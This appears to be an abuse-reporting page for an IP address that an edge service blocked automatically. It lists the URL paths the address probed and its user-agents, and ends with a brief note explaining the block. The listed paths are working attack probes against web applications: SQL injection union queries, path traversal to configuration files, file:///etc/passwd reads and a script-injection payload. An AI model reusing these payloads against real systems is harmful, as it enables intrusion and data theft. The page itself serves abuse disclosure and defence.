abuseip.org

Sample paths probed

• /Api/portal/elementEcodeAddon/getSqlData?sql
• /UserSelect/
• /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt
• /mobile/plugin/CheckServer.jsp?type=mobileSetting
• /tplus/ajaxpro/Ufida.T.SM.UIP.MultiCompanyController,Ufida.T.SM.UIP.ashx?method=CheckMutex
• /file/fileNoLogin/%7B%7Bidname%7D%7D
• /tplus/SM/DTS/DownloadProxy.aspx?preload=1&Path=../../Web.Config
• /portal/SptmForPortalThumbnail.jsp?preview=portal/SptmForPortalThumbnail.jsp
• /weaver/weaver.file.SignatureDownLoad?markId=0%20union%20select%20%27../ecology/WEB-INF/prop/weaver.properties%27
• /pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(HashBytes('MD5','999999999')),4,5,6,7
• /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/&fileExt=txt
• /mysql_config.ini
• /?PagePrincipale/listpages&tags=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
• /Api/portal/elementEcodeAddon/getSqlData?sql=select%20substring(sys.fn_sqlvarbasetostr(hashbytes('MD5','999999999')),3,32)
• /cgi-bin/gateway/agentinfo
• /E-mobile/App/System/Login/login_quick.php
• /iweboffice/officeserver.php?OPTION=LOADFILE&FILENAME=../mysql_config.ini
• /tplus/SM/SetupAccount/Upload.aspx?preload=1
• /cpt/manage/validate.jsp?sourcestring=validateNum
• /GNRemote.dll?GNFunction=LoginServer&decorator=text_wrap&frombrowser=esl

Sample User-Agents

• Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
• Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0

What does this mean?

This address sent traffic that the redirs.com edge classified as automated abuse — typically WordPress/PHP exploit scanning, credential file probing (.env, .git, .aws/), or mass-domain enumeration. The block is automatic and time-limited (24 hours from last detection).

If you believe this is a false positive, contact [email protected] with the IP and the timestamps above.